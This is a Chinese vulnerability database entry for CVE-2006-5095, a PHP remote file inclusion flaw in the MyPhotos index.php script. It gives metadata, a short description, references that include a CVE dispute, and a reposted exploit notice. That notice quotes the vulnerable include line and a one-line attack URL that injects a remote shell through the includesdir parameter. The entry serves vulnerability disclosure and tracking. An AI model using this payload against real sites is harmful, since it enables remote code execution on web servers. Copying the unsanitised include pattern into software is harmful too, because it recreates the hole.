MyPhotos 'index.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193338 漏洞类型 未知
发布时间 2006-09-29 更新时间 2006-10-19
CVE编号 CVE-2006-5095 CNNVD-ID CNNVD-200609-549
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006100022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-549
|漏洞详情
MyPhotos的index.php中存在PHP远程文件包含漏洞,远程攻击者可以通过includesdir参数执行任意PHP代码。
|漏洞EXP
************************************************************************
*******

***

***

***

***

***

***

***                                           PerSiaNFoX DigitaL

SecuritY TeaM                                                 ***

***

***

***

***

***

***

************************************************************************
*******

<# MyPhotos<= ( Remote File Include Vulnerability

<# Script.............. :MyPhotos

<#Download.....:http://jaist.dl.sourceforge.net/sourceforge/myphotos/myp
hotos-0.1.3b-beta.zip

<# Discovered By.... : Root3r_H3ll

<# Location .......... : Iran

<# Class..............  : Remote

<# Original Advisory : http://Www.PersainFox.com

<# We ArE : Root3r_H3LL , Arash.RJ

<#Spical TNX HB Team , All My Freinds

------------------------------------------------------------------------
-------------------------------------

< # Code :

include ("$includesdir/indextext.inc.php");

< # Expolit :

Www.Site.coM/[path]/index.php?includesdir=Sh3ll
|参考资料

来源:BUGTRAQ
名称:20060923MyPhotos<=RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/446876/100/0/threaded
来源:VIM
名称:20060927MyPhotosincludesdirfileinclusion-CVEdispute
链接:http://attrition.org/pipermail/vim/2006-September/001057.html
来源:BID
名称:20160
链接:http://www.securityfocus.com/bid/20160
来源:SREASON
名称:1656
链接:http://securityreason.com/securityalert/1656